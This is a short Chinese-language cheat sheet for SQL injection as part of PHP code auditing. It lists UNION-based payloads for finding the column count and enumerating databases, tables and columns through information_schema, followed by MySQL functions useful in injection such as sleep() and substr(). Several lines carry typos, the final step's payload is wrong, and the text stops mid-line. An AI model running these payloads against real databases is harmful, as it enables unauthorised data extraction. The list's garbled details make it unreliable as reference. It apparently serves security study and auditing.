php代码审计之sql注入

SQL注入常见步骤:

1.确定注入
2.确定字段数        1' GROUP/ORDER BY 1,2,3#
3.检索数据库        UNION SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata;
4.检索数据表        UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_ schema ='user';
5.检索字段          UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name ='tablename';
6.读取数据          UNION SELECT GROUP_CONCAT(column_name) FROM schema_name.table_name;

基础函数

user() :当前使用者的用户名
database():当前数据库名
version():数据库版本
datadir:读取数据库的绝对路径
@@vasedir: mysq|安 装路径
@@version_ compile_ os:操作系统
concat():连接-个或者多个字符串
group_concat():连接-个组的所有字符串，并以逗号分隔每一条数据
length():返回字符串的长度
substr():截取字符串
mid():截取字符串
ascii():返回字符的ascii码
sleep():函数延迟代码执行若干秒
~是一个一元运算符，将x按位取补
!取反
hex()
unhex()
CONV(N,from_ base,to_ base)
SELECT CONV(5,16,2); //